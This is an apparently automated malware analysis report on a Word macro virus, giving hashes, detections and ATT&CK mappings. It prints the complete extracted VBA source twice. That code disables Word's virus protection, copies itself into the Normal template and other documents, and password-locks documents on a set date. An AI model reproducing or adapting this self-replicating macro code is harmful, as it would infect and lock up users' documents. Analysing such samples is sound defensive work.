Doc.Trojan.Pendron-1 Office (OLE) malware analysis — malicious · e2a7092542ed9ccd

MALICIOUS

Office (OLE)

40.0 KB Created: 2000-04-19 03:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 0ec29e7bdfe4c3439d2755c94848d3bc SHA-1: 9fb413790806764e55c02fa549be44f84c00b3eb SHA-256: e2a7092542ed9ccd43f1031cfb22a0c3c353dc9fdeebbee591e9cdb8afad414b

200 Risk Score

Malware Insights

Doc.Trojan.Pendron-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, which are indicative of older malware families. The VBA script displays a deceptive message to the user, claiming ownership of their Microsoft Word installation, which is a social engineering tactic. The ClamAV detection name 'Doc.Trojan.Pendron-1' strongly suggests the family and its malicious intent.

Heuristics 5

ClamAV: Doc.Trojan.Pendron-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Pendron-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3502 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3502 bytes
SHA-256: `d09cbb0126a242d150cf33b9fa926946e7d4cb3030e831a49d4c9070f3a2c20d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AuAhGelap" Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long Sub AutoOpen() On Error GoTo kagabisa: If Not Application.UserName = "Sembako" Then With Assistant.NewBalloon .Icon = msoIconNone .Text = "Hello " & Application.UserName & ". Sorry, but your Microsoft Word doesn't belong to you any more. Now it is mine!!" .Animation = msoAnimationGreeting .Show End With End If Au Ah Gelap kagabisa: End Sub Sub AutoClose() Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.AuAhGelap.AutoClose" On Error GoTo kagabisa: If ActiveDocument.Saved = False Then ActiveDocument.Save If Not Application.UserName = "Sembako" Then With Assistant.NewBalloon .Icon = msoIconNone .Text = "Hello " & Application.UserName & ". Sorry, but your Microsoft Word doesn't belong to you any more. Now it belongs to me ""The Sembako""!!" .Animation = msoAnimationGreeting .Show End With End If Au Ah Gelap Rem SwapMouseButton &H4 kagabisa: End Sub Sub Au() If (Time >= #8:00:00 AM#) And (Time <= #9:00:00 AM#) Then MsgBox "Selamat pagi cewek-cewek yang cakep-cakep .", vbOKOnly, "Selamat pagi" If (Time >= #12:00:00 PM#) And (Time <= #2:00:00 PM#) Then MsgBox "Hallo cewek-cewek, udah pada makan siang belum ? Sekarang udah jam " & Time & " loh. Salam sayang buat kamu semua dari my creator.", vbOKOnly, "Selamat siang ." If Time > #5:00:00 PM# Then MsgBox "Hallo cewek-cewek, kok belum pulang sih? Sekarang udah jam " & Time & " loh. Eh, ada salam dari my creator.", vbOKOnly, "Selamat sore. " If Day(Now) = 18 And Month(Now) = 4 Then Selection.Font.Size = 24 Selection.Font.Animation = wdAnimationSparkleText Selection.TypeText ("Happy birthday to my Creator! ") ActiveDocument.Password = "!@#$%BoMoH!@#$%" End If End Sub Sub ToolsMacro() MsgBox "Eit ! Kamu enggak boleh ngeliat Macro !" End Sub Sub Ah() On Error GoTo rusak: Options.VirusProtection = False Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone Options.VirusProtection = False Application.UserName = "Sembako" Application.UserInitials = "SBK" DocumentInstalled = False Options.EnableSound = False Set ActiveDoc = ActiveDocument Set GlobalDoc = NormalTemplate If NormalInstalled = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="AuAhGelap", Object:=wdOrganizerObjectProjectItems ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate ActiveDocument.Saved = False End If rusak: End Sub Sub Gelap() On Error GoTo rusak: Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone Options.VirusProtection = False Set ActiveDoc = ActiveDocument Set GlobalDoc = NormalTemplate GlobalInstalled = False If GlobalInstalled = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="AuAhGelap", Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = False ActiveDocument.Saved = False End If rusak: End Sub Sub ViewVBCode() : End Sub

SHA-256: d09cbb0126a242d150cf33b9fa926946e7d4cb3030e831a49d4c9070f3a2c20d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AuAhGelap"
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long

Sub AutoOpen()
On Error GoTo kagabisa:
If Not Application.UserName = "Sembako" Then
With Assistant.NewBalloon
    .Icon = msoIconNone
    .Text = "Hello " & Application.UserName & ".              Sorry, but your Microsoft Word doesn't belong to you any more. Now it is mine!!"
    .Animation = msoAnimationGreeting
    .Show
End With
End If
Au
Ah
Gelap
kagabisa:
End Sub

Sub AutoClose()
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.AuAhGelap.AutoClose"
On Error GoTo kagabisa:
If ActiveDocument.Saved = False Then ActiveDocument.Save
If Not Application.UserName = "Sembako" Then
With Assistant.NewBalloon
    .Icon = msoIconNone
    .Text = "Hello " & Application.UserName & ".                    Sorry, but your Microsoft Word doesn't belong to you any more. Now it belongs to me ""The Sembako""!!"
    .Animation = msoAnimationGreeting
    .Show
End With
End If
Au
Ah
Gelap
Rem SwapMouseButton &H4
kagabisa:
End Sub
Sub Au()
If (Time >= #8:00:00 AM#) And (Time <= #9:00:00 AM#) Then MsgBox "Selamat pagi cewek-cewek yang cakep-cakep .", vbOKOnly, "Selamat pagi"
If (Time >= #12:00:00 PM#) And (Time <= #2:00:00 PM#) Then MsgBox "Hallo cewek-cewek, udah pada makan siang belum ? Sekarang udah jam " & Time & " loh.           Salam sayang buat kamu semua dari my creator.", vbOKOnly, "Selamat siang ."
If Time > #5:00:00 PM# Then MsgBox "Hallo cewek-cewek, kok belum pulang sih? Sekarang udah jam " & Time & " loh. Eh, ada salam dari my creator.", vbOKOnly, "Selamat sore. "
If Day(Now) = 18 And Month(Now) = 4 Then
    Selection.Font.Size = 24
    Selection.Font.Animation = wdAnimationSparkleText
    Selection.TypeText ("Happy birthday to my Creator! ")
    ActiveDocument.Password = "!@#$%BoMoH!@#$%"
End If
End Sub
Sub ToolsMacro()
MsgBox "Eit ! Kamu enggak boleh ngeliat Macro !"
End Sub
Sub Ah()
On Error GoTo rusak:
Options.VirusProtection = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Application.UserName = "Sembako"
Application.UserInitials = "SBK"
DocumentInstalled = False
Options.EnableSound = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
If NormalInstalled = False Then
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="AuAhGelap", Object:=wdOrganizerObjectProjectItems
    ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
    ActiveDocument.Saved = False
End If
rusak:
End Sub
Sub Gelap()
On Error GoTo rusak:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
GlobalInstalled = False
If GlobalInstalled = False Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="AuAhGelap", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
    ActiveDocument.Saved = False
End If
rusak:
End Sub

Sub ViewVBCode()
:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.